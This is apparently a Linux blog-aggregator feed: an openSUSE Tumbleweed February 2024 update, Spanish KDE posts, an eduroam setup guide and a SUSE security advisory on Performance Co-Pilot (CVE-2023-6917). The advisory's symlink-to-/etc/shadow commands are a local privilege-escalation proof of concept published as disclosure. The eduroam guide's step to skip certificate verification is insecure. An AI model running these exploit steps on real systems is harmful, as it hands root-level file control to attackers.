Welcome to the monthly update for openSUSE Tumbleweed for February 2024. This month we get one more day in February because of Leap year, but here is what we have for the month. This blog aims to provide readers with an overview of the key changes, improvements and issues addressed in openSUSE Tumbleweed snapshots throughout the month. Should readers desire a more frequent amount of information about openSUSE Tumbleweed snapshots, readers are advised to subscribe to the openSUSE Factory mailing list.

New Features and Enhancements

• Linux Kernel: February brought updates to the Linux kernel, progressing through versions 6.7.2 to 6.7.6. These updates focus on enhancing memory management, addressing some security vulnerabilities, and introducing support for new hardware models, ensuring improved compatibility and performance across various systems.
  • Fixes for various issues, including null-pointer dereference in powerpc/mm, incorrect node setting for arm64 irq, and build errors in powerpc architecture.
  • Correcting the node assignment for VMAP stack in the arm64 irq module.
  • Fix for a null-pointer dereference in pgtable_cache_add in the powerpc/mm module.
  • Fixes for various issues in filesystems like ext4 and JFS.
  • Ensuring proper handling of NMIs during very early boot in the x86/boot module.
  • New hardware support or models:
  • Colorful X15 AT 23 Laptop
• KDE Frameworks: Update for version 5.115.0.
  • xtra CMake Modules: The ECMUninstallTarget now ports generated code away from deprecated exec_program, enhancing compatibility and maintainability.
  • KHolidays: Adds St Brigid’s Day.
  • KIO: Once again KDirModel, allows expanding network directories in file picker.
  • prison : Enables exceptions for videoscannerworker.cpp.
• Mesa: Updates to 23.3.6
  • zink: Addresses flickering artifacts in Selaco, broken colors/dual-source blending on PinePhone Pro, and fixes sparse bo placement.
  • panfrost: Resolves graphical artifacts on T604 (T600), fixes intermittent compiler failures when building valhall tests, and pads compute jobs with zeros on v4.
  • radeonsi: Fixes unsynchronized flips/tearing with KMS DRM rendering on 780M and addresses heavy corruption in Amnesia: The Dark Descent.
  • VK: Various fixes for flaky tests, fullscreen “banding” artifacts in Age of Empires IV, and failures in dEQP-VK pipeline tests.
• systemd: Updates to version 254.9.
  • vconsole-setup: Resolved issue where vconsole-setup would fail if the only found vc is already used by plymouth.
  • systemd-testsuite: Dependency updated to “qemu” instead of “qemu-kvm”, the latter being obsolete.
  • test/test-shutdown.py: Option added to display test I/Os in a dedicated log file.
  • man pages: Documentation update to include ranges for distributions config files and local config files.
  • libbpf: Version of libbpf dlopened by systemd updated (weak dependency).
• glibc: Updated from version 2.38 to 2.39,
  • PLT Rewrite: Introduction of a new tunable, glibc.cpu.plt_rewrite, allows for enabling PLT rewrite on x86-64 architectures.
  • Sync with Linux Kernel 6.6: Synchronization with Linux kernel 6.6 shadow stack interface.
  • New Functions: Addition of new functions on Linux, including posix_spawnattr_getcgroup_np, posix_spawnattr_setcgroup_np, pidfd_spawn, pidfd_spawp, and pidfd_getpid.
  • scanf-family functions: Support for the wN format length modifiers for arguments pointing to specific types.
  • Memory Allocation Tunable: Introduction of a new tunable, glibc.mem.decorate_maps, for adding additional information on underlying memory allocated by glibc.
  • ISO C2X: Inclusion of the <stdbit.h> header from ISO C2X.
  • AArch64: Addition of new symbols to libmvec on AArch64.
  • ldconfig Enhancements: ldconfig now skips file names containing specific characters and patterns.
  • Dynamic Linker Improvements: The dynamic linker calls the malloc and free functions in more cases during TLS access if a shared object with dynamic TLS is loaded and unloaded.
• Cups-Filters: Updates to version 1.28.17
  • Improved Printer Capability Discovery: Enhancements to more reliably discover all printer capabilities from driverless printers, particularly borderless printing. This includes preferring Apple Raster over PWG Raster or PCLM formats.
  • PPD Generator Optimization: The PPD generator now creates only one *cupsFilter2 line for raster, utilizing the most desirable/reliable format, usually Apple Raster.
  • Media Database Handling: Enhancements in handling media-col-database and media-col-ready IPP attributes separately if needed, revealing important functionality like borderless printing.
  • Margin Alternatives Consideration: Consideration of all margin alternatives when generating PPD files for driverless printers, ensuring the discovery of borderless functionality for many printers.
  • Image Printing Enhancements: Images are now printed in their original size with “print-scaling=none”, and deprecated data types for reading TIFF images have been replaced with modern equivalents.
• openvpn: Updates to version 2.6.9
  • Enhanced Logging: SSL alerts are now logged more prominently, improving visibility into SSL-related issues.
  • Documentation Improvements: Clarifications and additions to documentation, including the documentation of the tls-exit option as a primarily test option.
  • Code Cleanup: Removal of unused function prototypes and redundant code, ensuring cleaner codebase and improved maintainability.
  • Error Handling: Addition of missing error checks and enhancements to error messages for better debugging and troubleshooting.
  • Security Enhancements: Implementation of the --tls-export-cert feature and addition of checks for TLS 1.0 PRF availability, improving security measures.
  • Configuration Clarifications: Clarifications regarding the tls-crypt-v2-verify option and removal of redundant options like --tls-export-cert.
  • Library Compatibility: Support added for newer versions of dependencies like mbedtls 3.x.y, with TLS 1.3 support disabled.

Security Updates

This month’s updates include critical security patches and bug fixes for glibc, GStreamer, Salt, Xen and many other packages.

Bug Fixes

• glibc: Had a few Common Vulnerabilities and Exposures fixed. CVE-2023-6246, CVE-2023-6779, which was a buffer overflow, CVE-2023-6780, which was an integer overflow, both that lead to an incorrect calculation of the buffer size.
• GStreamer: CVE-2024-0444 made it possible for a malicious third party to trigger a crash in the application.
• Salt: CVE-2024-22231 was vulnerable to a directory traversal attack and CVE-2024-22232, with a specially crafted url, could lead to a directory traversal in the salt file server.
• Xen: CVE-2023-46839 had a high complexity and required high privileges.
• dnsmasq: Both CVE-2023-50387 and CVE-2023-50868 could allow for remote attackers to cause a denial of service.
• qemu: CVE-2023-6693 could allow a hacker to steal data via a network device.
• bind: CVE-2023-50387 was associated with a “KeyTrap” DNS flaw lets attackers overload servers remotely. The other three were CVE-2023-4408, CVE-2023-5679 and CVE-2023-6516.
• Node.js: Multiple CVEs were fixed. These were CVE-2024-21892, which let unprivileged users gain elevated rights, CVE-2024-22019, which was a flaw that let attackers crash servers with malformed requests, and CVE-2024-22017, which was a path traversal bug via Buffer manipulation in an experimental feature. There was also CVE-2024-21896, CVE-2023-46809, CVE-2024-21891, CVE-2024-21890, CVE-2024-22025 and CVE-2024-24758, which kept Proxy-Authentication headers after redirects; upgrade as needed.

Conclusion

February 2024 for openSUSE Tumbleweed showcases a diverse range of updates and improvements across essential components. There were critical security patches for software like glibc, GStreamer and Salt. The kernel updated from 6.7.2 at the beginning of the month to 6.7.6. There were updates for KDE Frameworks, Mesa, systemd, Cups-Filters and other core components. Other significant upgrades during the month included fwupd 1.9.13, PostgreSQL 16.2, Pulseaudio 17.0, GTK 4.12.5, Python 3.11.8, RPM 4.19.1.1, Mozilla Firefox 122.0.1, PHP 8.2.16, Poppler 24.02.0, Shadow 4.14.5, binutils 2.42, Qemu 8.2.1 and, Python 3.12. Next month should see systemd 255.3 arrive in the rolling release as the package is currently in staging.. The openSUSE team encourages users to continue participating through bug reports, feature suggestions and discussions.

Contributing to openSUSE Tumbleweed

Your contributions and feedback make openSUSE Tumbleweed better with every update. Whether reporting bugs, suggesting features, or participating in community discussions, your involvement is highly valued.

La entrada ¿Estás preparado? se publicó primero en KDE Blog.

Most log messages fit on a single line. However, Windows and some developer tools and services, like Tomcat, write multi-line log messages. These can come in various formats. For example, new log messages start with a date in a specific format. You use the multi-line-prefix() of the syslog-ng file() source to send multi-line messages as single messages instead of line by line.

I must admit that I have never seen multi-line logs in production. I am not a developer, do not run Tomcat or Windows. However, recently I tested a software on Windows, which produced multi-line log messages.

You can read more at https://www.syslog-ng.com/community/b/blog/posts/working-with-multi-line-logs-in-syslog-ng

Uno de los temas recurrentes del blog son los plasmoides. Hace ya mucho tiempo que publiqué los artículos recopilatorios del 1 al 25, 26 al 50 , del 51 al 75 y del 76 al 100 pero sigo teniendo pendiente hacer los siguientes. Ahora que estamos a punto de llegar a los 250 es el momento de seguir con 25 plasmoides más para el escritorio Plasma, en esta ocasión del 76 al 100.

¿Qué son los plasmoides?

Para los no iniciados en el blog, quizás la palabra plasmoide le suene un poco rara pero no es mas que el nombre que reciben los widgets para el escritorio Plasma de KDE.

En otras palabras, los plasmoides no son más que pequeñas aplicaciones que puestas sobre el escritorio aumentan las funcionalidades del mismo, nos dan información útil o simplemente lo decoran.

25 plasmoides para el escritorio Plasma de KDE, del 101 al 125

La siguiente lista puede tener algún que otro plasmoide desactualizado pero es un buen repaso a estas miniaplicaciones que llenan de funcionalidad al escritorio más completo que puedes encontrar en el mercado… y uno de los que tienen mejor precio: 0 €.

1. Simple Weather: un plasmoide meteorológico.
2. Latter Space:  añade un espacio en blanco de dimensiones personalizable en cualquier barra de tareas del escritorio Plasma.
3. Daily Forecast: otro plasmoide meteorológico.
4. Public IP Address: controlada nuestra dirección de internet pública.
5. Latte Slideshow:  informa al panel de Latte del color predominante y ésta adapta su color.
6. Latte Window Colors: cambia automáticamente la barra de Latte Dock según el color que tengamos elegido en nuestro sistema.
7. EQMen: lanzador de aplicaciones para EQuilibrium
8. Media Controller Compact:  plasmoide que nos permite controlar nuestro reproductor multimedia desde la barra de tareas. 
9. Bumblebee-indicator: muestra el estado de la tecnología Bumblebee de las tarjetas Nvidia en nuestro sistema KDE.
10. Device: accede a tus pendrive desde el escritorio cuando se monten.
11. Termoid: muestra una terminal que puedes poner en tu escritorio.
12. KickEQ: otro lanzador de aplicaciones para EQuilibrium.
13. Plasma Customization Saver: guardando tu configuración Plasma.
14. Customizable multi-action menu: un plasmoide que nos ayuda a personalizar el menú contextual de Dolphin.
15. Latte Analog Clock: el clásico reloj analógicoadaptado a las peculiaridades de Latte Dock.
16. Chili Clock: un plasmoide que nos permite tener otro reloj digital en nuestro entorno Plasma.
17. Digital Clock WL: alternativa al clásico reloj digital que incorpora otra forma de visualización del calendario.
18. Ditto Menu: otro lanzador de aplicaciones
19. Vertical Digital Clock EQ: otro reloj digital que tiene una característica única, mostrar la hora en disposición vertical.
20. Fokus: tu pomodoro para KDE.
21. Virtual Desktop Bar: un plasmoide creado por Wsdfhjxc que nos permite pasar de un escritorio virtual a otro.
22. Mediacontroller Plus, vitamina el control multimedia de Plasma.
23. Crypto Currency Price Plasmoid: también hay plasmoides para controlar las criptomonedas.
24. USwitch: un plasmoide que nos permite adaptar la «ventana» de salida del sistema a nuestros gustos o necesidades.
25. Kickoff/Grid: lanzador estilo tabla para Plasma
26. Split Digital Clock: otro reloj digital con disposición Vertical.

Y con esto llegamos a los 125… todavía me quedan más de 150 por recopilar. Ya se hará,

La entrada 25 plasmoides para el escritorio Plasma de KDE, del 101 al 125 se publicó primero en KDE Blog.

I tried to setup eduroam for the Humboldt University of Berlin (Humboldt Universität in Berlin) using the app advertised in the manual: geteduroam

Unfortunately, the app crashes on my Android phone. If this is your case as well, proceed as follows:

1. download the CA certificate hu-ca-2024.crt¹
2. go to your wifi settings and select eduroam to setup this wifi
3. use TTLS/PAP (I forgot which one)
4. add anonymous identity: eduroam@hu-berlin.de
5. add username as username@hu-berlin.de (use username@physik.hu-berlin.de or username@mathematik.hu-berlin.de if your account is with those faculties)
6. add as CA certificate the file downloaded before
7. do not verify this certificate
8. add as domain: hu-berlin.de

Note that other universities may require other setups.

1) Introduction

Performance Co-Pilot (pcp) is a performance analysis toolkit that allows to gather and evaluate data on a local system and also share this data over the network in a distributed manner.

During routine reviews we noticed issues in pcp on Linux with directory permissions that allow to locally escalate privileges from the pcp service user to root.

These findings are based on the 5.3.7 version release of pcp. CVE-2023-6917 has been assigned for this class of issues in pcp.

2) Service User And Directory Permissions

The systemd services shipped with pcp run with mixed privileges. Some use only limited pcp user/group privileges, like “pmie_check.service”. Others like “pmcd.service” run with full root privileges. The pmcd daemon implements the networking logic of pcp. It drops privileges from root to pcp during startup.

The different pcp programs use a shared directory structure:

• /var/lib/pcp/tmp owned by pcp:pcp mode 0775
• /var/log/pcp owned by pcp:pcp mode 0775

When privileged processes running as root access files in directories or directory trees controlled by unprivileged users, then easily security issues can result from this. For the directories listed above, we quickly found the two exploitable issues that are described in the following sections.

3a) Startup Script for pmcd runs chown for $PCP_TMP_DIR/pmlogger

The “pmcd.service” runs with root privileges and executes the bash script “/usr/libexec/pcp/lib/pmcd” (named “rc_pmcd” in the Git source repository). Within this script the following code runs as part of the start routine, found in function _reboot_setup():

 if [ ! -d "$PCP_TMP_DIR/pmlogger" ]
 then
     mkdir -p -m 775 "$PCP_TMP_DIR/pmlogger"
     chown $PCP_USER:$PCP_GROUP "$PCP_TMP_DIR/pmlogger"
     if which restorecon >/dev/null 2>&1
     then
         restorecon -r "$PCP_TMP_DIR"
     fi
 else

$PCP_TMP_DIR in this context refers to “/var/lib/pcp/tmp”, owned by pcp:pcp mode 0775. Since the shell code above does not exit on errors, a compromised pcp user doesn’t even have to win a race condition to perform a symlink attack. The following exploit works:

# simulate a compromised pcp user
root # sudo -u pcp -g pcp bash
pcp  $ cd /var/lib/pcp/tmp
pcp  $ rm -r pmlogger
pcp  $ ln -s /etc/shadow pmlogger
pcp  $ exit
root # systemctl start pcmd.service
root # ls -l /etc/shadow
-rw-r----- 1 pcp pcp 1.2K Dec  7 15:47 /etc/shadow

3b) Startup Script for pmproxy runs chown in $RUN_DIR

The “pmproxy.service” runs with root privileges and executes the bash script “/usr/libexec/pcp/lib/pmproxy” (named rc_pmproxy in the Git source repository). Within this script the following code runs as part of the start (and other) routines:

# create directory which will serve as cwd
if [ ! -d "$RUNDIR" ]
then
    mkdir -p -m 775 "$RUNDIR"
    chown $PCP_USER:$PCP_GROUP "$RUNDIR"
fi

$RUN_DIR in this context refers to “/var/log/pcp/pmproxy”. “/var/log/pcp” is owned by pcp:pcp mode 0775. Similar to the exploit described in section 3a), no race condition has to be won to exploit this:

# simulate a compromised pcp user
root # sudo -u pcp -g pcp bash
pcp  $ cd /var/log/pcp
pcp  $ rm -rf pmproxy
pcp  $ ln -s /etc/shadow pmproxy
pcp  $ exit
root # systemctl start pmproxy.service
root # ls -l /etc/shadow
-rw-r----- 1 pcp pcp 1.2K Dec  7 15:47 /etc/shadow

4) Summary

We only picked two of the more obvious security issues that result from root processes operating on these pcp owned directories. There are likely more issues of the same class lingering in the pcp scripts that run as root. Given this, the user separation of pcp can be considered nonexistent in its current form, and the pcp user should be treated equal to root.

The pcp service user is also used for the network facing pmcd component, thus these issues strongly impact defense in depth for pcp, for the scenario when an attacker finds a way to exploit the network daemon.

5) Bugfix

Upstream performed a wider redesign of the privilege separation handling in pcp components. The pull request corresponding to this contains a large number of commits. It is difficult to isolate any simple patches from that.

In our Bugzilla bug that tracks this issue, I attempted to identify the subset of commits relevant to this issue, to help with backporting.

6) Timeline

7) References

• PCP website
• Upstream Pull Request that Addresses the Issues
• List of Relevant Bugfix Commits in our SUSE Bugzilla

Organizada por la asociación sin ánimo de lucro GNU/Linux València retomamos las charlas Hablemos para finales de marzo. Y lo hace con una Mesa redonda y tertulia Linuxera que se celebrará el próximo el próximo 22 de marzo a las 19:00 horas.

Mesa redonda y tertulia Linuxera – Charla Hablemos de marzo de GNU/Linux València

Me complace presentaros un nuevo evento de la Asociación sin Ánimo de Lucro GNU/Linux València que retoman sus actividades con una vuelta a las orígenes, las mesas redondas y la tertulias con temas abiertos, al estilo primer evento en el que participé con ellos en Akademy-es 2018.

De esta forma se espera a empezar a calentar motores dado que no hay que olvidar que el próximo 24 y 25 de mayo se celebrará esLibre y Akademy-es en València, y justamente en la misma sede (o al menos en una de ellas, Las Naves).

En palabras de los organizadores:

Comenzaremos la ronda de eventos con un Hablemos, en el que debatiremos sobre temas de actualidad Linuxera.

Es este caso será el 22 de marzo a las 19:00 a 20:30 GTM+2 (huso horario de la España peninsular) en Las Naves (Carrer de Joan Verdeguer, 16, 46024, València: Localización en OpenStreetMap).

Más información: GNU/Linux València

¡Únete a GNU/Linux València!

Aprovecho para recordar que desde hace unos meses, los chicos de GNU/Linux Valencia ya tienen su menú propio en el blog, con lo que seguir sus eventos en esta humilde bitácora será más fácil que nunca, y así podréis comprobar su alto nivel de actividades que realizan que destacan por su variedad.

Y que además, GNU/Linux València creció y se ha convertió en asociación. Así que si buscas una forma de colaborar con el Software Libre, esta asociación puede ser tu sitio. ¡Te esperamos!

La entrada Mesa redonda y tertulia Linuxera – Charla Hablemos de marzo de GNU/Linux València se publicó primero en KDE Blog.

La comunidad de KDE publicará un megalanzamiento el próximo 28 de febrero de 2024

Encaramos la última semana de febrero de 2024. Eso significa que en un par de días, el próximo 28 de febrero, se publicará de manera oficial el gran megalanzamiento de la comunidad KDE.

Este gran megalanzamiento consiste en la publicación de su escritorio Plasma versión 6, KDE Gear y Frameworks.

Soy usuario de KDE desde que comencé en esto de GNU/Linux. En KDE encontré un escritorio flexible, potente, amigable, y grandes aplicaciones para mi día a día. Que hacían que el software libre fuese usable y amigable para un neófito como yo.

Hoy en día, después de tantos años, sigo manteniendo mi pasión por el software creado por la comunidad de KDE. Sigo encontrando que hacen un trabajo de calidad, comprometidos con unos valores a los que quiero apoyar.

Así que no quería dejar de anunciaron que el próximo día 28 de febrero de 2024, publicarán un gran lanzamiento que abarcará su escritorio Plasma, KDE Gears y Frameworks.

Plasma

En KDE Plasma es el entorno de escritorio, lo que «dibuja» en tu equipo las ventanas, las barras, los botones y cómo estas se comportan. Esta nueva versión 6 integra Qt6 sobre la que se integra Plasma.

KDE Gear

Corresponde al conjunto de aplicaciones propias de la comunidad KDE. Sin duda se convierten en imprescindibles aplicaciones como Dolphin, Kate o Kdenlive (por citar unas pocas).

Se integran con el sistema y tienes una aplicación para casi cualquier cosa que necesites. También en este megalanzamiento se actualizarán estas aplicaciones.

KDE Frameworks

Añade herramientas creadas por la comunidad de KDE encima de las que proporciona el conjunto de herramientas de Qt.

Esta gran actualización de la comunidad de KDE, no solo implica un gran trabajo y labor de desarrollo y depuración. Mi gratitud a todas esas personas. También implica un compromiso a seguir desarrollando software libre innovando y apostando por nuevos diseños y tecnologías más modernas.

Pronto llegará a las principales distribuciones rolling release, como por ejemplo openSUSE Tumbleweed o Arch y derivadas.

En openSUSE sé que se van probando las distintas versiones de desarrollo que se han ido publicando, por lo que como siempre, la gente que empaqueta el software de KDE para openSUSE pronto lo tendrá disponible y lo podré disfrutar en mi equipo.

Personalmente con esta nueva publicación, quiero aprovecharla para hacer limpieza en mi portátil. Tengo Tumbleweed desde hace muchos años, en los que se han acumulado programas o utilidades ya no utilizo, repositorios de pruebas, etc.

Cuando tenga tiempo, quiero guardar lo necesario, y formatear de nuevo el equipo para instalar una openSUSE Tumbleweed desde cero.